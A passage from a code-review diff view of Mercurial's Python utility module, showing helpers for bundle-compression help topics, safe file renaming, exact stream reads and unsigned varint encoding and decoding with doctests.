3851 """Obtains a list of available bundle compressions for use in help."""
3854 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3852 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3855 items = {}
3853 items = {}
3856
3854
3857 # We need to format the docstring. So use a dummy object/type to hold it
3855 # We need to format the docstring. So use a dummy object/type to hold it
3858 # rather than mutating the original.
3856 # rather than mutating the original.
3859 class docobject(object):
3857 class docobject(object):
3860 pass
3858 pass
3861
3859
3862 for name in compengines:
3860 for name in compengines:
3863 engine = compengines[name]
3861 engine = compengines[name]
3864
3862
3865 if not engine.available():
3863 if not engine.available():
3866 continue
3864 continue
3867
3865
3868 bt = engine.bundletype()
3866 bt = engine.bundletype()
3869 if not bt or not bt[0]:
3867 if not bt or not bt[0]:
3870 continue
3868 continue
3871
3869
3872 doc = pycompat.sysstr('``%s``\n %s') % (
3870 doc = pycompat.sysstr('``%s``\n %s') % (
3873 bt[0], engine.bundletype.__doc__)
3871 bt[0], engine.bundletype.__doc__)
3874
3872
3875 value = docobject()
3873 value = docobject()
3876 value.__doc__ = doc
3874 value.__doc__ = doc
3877 value._origdoc = engine.bundletype.__doc__
3875 value._origdoc = engine.bundletype.__doc__
3878 value._origfunc = engine.bundletype
3876 value._origfunc = engine.bundletype
3879
3877
3880 items[bt[0]] = value
3878 items[bt[0]] = value
3881
3879
3882 return items
3880 return items
3883
3881
3884 i18nfunctions = bundlecompressiontopics().values()
3882 i18nfunctions = bundlecompressiontopics().values()
3885
3883
3886 # convenient shortcut
3884 # convenient shortcut
3887 dst = debugstacktrace
3885 dst = debugstacktrace
3888
3886
3889 def safename(f, tag, ctx, others=None):
3887 def safename(f, tag, ctx, others=None):
3890 """
3888 """
3891 Generate a name that it is safe to rename f to in the given context.
3889 Generate a name that it is safe to rename f to in the given context.
3892
3890
3893 f: filename to rename
3891 f: filename to rename
3894 tag: a string tag that will be included in the new name
3892 tag: a string tag that will be included in the new name
3895 ctx: a context, in which the new name must not exist
3893 ctx: a context, in which the new name must not exist
3896 others: a set of other filenames that the new name must not be in
3894 others: a set of other filenames that the new name must not be in
3897
3895
3898 Returns a file name of the form oldname~tag[~number] which does not exist
3896 Returns a file name of the form oldname~tag[~number] which does not exist
3899 in the provided context and is not in the set of other names.
3897 in the provided context and is not in the set of other names.
3900 """
3898 """
3901 if others is None:
3899 if others is None:
3902 others = set()
3900 others = set()
3903
3901
3904 fn = '%s~%s' % (f, tag)
3902 fn = '%s~%s' % (f, tag)
3905 if fn not in ctx and fn not in others:
3903 if fn not in ctx and fn not in others:
3906 return fn
3904 return fn
3907 for n in itertools.count(1):
3905 for n in itertools.count(1):
3908 fn = '%s~%s~%s' % (f, tag, n)
3906 fn = '%s~%s~%s' % (f, tag, n)
3909 if fn not in ctx and fn not in others:
3907 if fn not in ctx and fn not in others:
3910 return fn
3908 return fn
3911
3909
3912 def readexactly(stream, n):
3910 def readexactly(stream, n):
3913 '''read n bytes from stream.read and abort if less was available'''
3911 '''read n bytes from stream.read and abort if less was available'''
3914 s = stream.read(n)
3912 s = stream.read(n)
3915 if len(s) < n:
3913 if len(s) < n:
3916 raise error.Abort(_("stream ended unexpectedly"
3914 raise error.Abort(_("stream ended unexpectedly"
3917 " (got %d bytes, expected %d)")
3915 " (got %d bytes, expected %d)")
3918 % (len(s), n))
3916 % (len(s), n))
3919 return s
3917 return s
3920
3918
3921 def uvarintencode(value):
3919 def uvarintencode(value):
3922 """Encode an unsigned integer value to a varint.
3920 """Encode an unsigned integer value to a varint.
3923
3921
3924 A varint is a variable length integer of 1 or more bytes. Each byte
3922 A varint is a variable length integer of 1 or more bytes. Each byte
3925 except the last has the most significant bit set. The lower 7 bits of
3923 except the last has the most significant bit set. The lower 7 bits of
3926 each byte store the 2's complement representation, least significant group
3924 each byte store the 2's complement representation, least significant group
3927 first.
3925 first.
3928
3926
3929 >>> uvarintencode(0)
3927 >>> uvarintencode(0)
3930 '\\x00'
3928 '\\x00'
3931 >>> uvarintencode(1)
3929 >>> uvarintencode(1)
3932 '\\x01'
3930 '\\x01'
3933 >>> uvarintencode(127)
3931 >>> uvarintencode(127)
3934 '\\x7f'
3932 '\\x7f'
3935 >>> uvarintencode(1337)
3933 >>> uvarintencode(1337)
3936 '\\xb9\\n'
3934 '\\xb9\\n'
3937 >>> uvarintencode(65536)
3935 >>> uvarintencode(65536)
3938 '\\x80\\x80\\x04'
3936 '\\x80\\x80\\x04'
3939 >>> uvarintencode(-1)
3937 >>> uvarintencode(-1)
3940 Traceback (most recent call last):
3938 Traceback (most recent call last):
3941 ...
3939 ...
3942 ProgrammingError: negative value for uvarint: -1
3940 ProgrammingError: negative value for uvarint: -1
3943 """
3941 """
3944 if value < 0:
3942 if value < 0:
3945 raise error.ProgrammingError('negative value for uvarint: %d'
3943 raise error.ProgrammingError('negative value for uvarint: %d'
3946 % value)
3944 % value)
3947 bits = value & 0x7f
3945 bits = value & 0x7f
3948 value >>= 7
3946 value >>= 7
3949 bytes = []
3947 bytes = []
3950 while value:
3948 while value:
3951 bytes.append(pycompat.bytechr(0x80 | bits))
3949 bytes.append(pycompat.bytechr(0x80 | bits))
3952 bits = value & 0x7f
3950 bits = value & 0x7f
3953 value >>= 7
3951 value >>= 7
3954 bytes.append(pycompat.bytechr(bits))
3952 bytes.append(pycompat.bytechr(bits))
3955
3953
3956 return ''.join(bytes)
3954 return ''.join(bytes)
3957
3955
3958 def uvarintdecodestream(fh):
3956 def uvarintdecodestream(fh):
3959 """Decode an unsigned variable length integer from a stream.
3957 """Decode an unsigned variable length integer from a stream.
3960
3958
3961 The passed argument is anything that has a ``.read(N)`` method.
3959 The passed argument is anything that has a ``.read(N)`` method.
3962
3960
3963 >>> try:
3961 >>> try:
3964 ... from StringIO import StringIO as BytesIO
3962 ... from StringIO import StringIO as BytesIO
3965 ... except ImportError:
3963 ... except ImportError:
3966 ... from io import BytesIO
3964 ... from io import BytesIO
3967 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3965 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3968 0
3966 0
3969 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3967 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3970 1
3968 1
3971 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3969 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3972 127
3970 127
3973 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3971 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3974 1337
3972 1337
3975 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3973 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3976 65536
3974 65536
3977 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3975 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3978 Traceback (most recent call last):
3976 Traceback (most recent call last):
3979 ...
3977 ...
3980 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3978 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3981 """
3979 """
3982 result = 0
3980 result = 0
3983 shift = 0
3981 shift = 0
3984 while True:
3982 while True:
3985 byte = ord(readexactly(fh, 1))
3983 byte = ord(readexactly(fh, 1))
3986 result |= ((byte & 0x7f) << shift)
3984 result |= ((byte & 0x7f) << shift)
3987 if not (byte & 0x80):
3985 if not (byte & 0x80):
3988 return result
3986 return result
3989 shift += 7
3987 shift += 7
General Comments 0
You need to be logged in to leave comments. Login now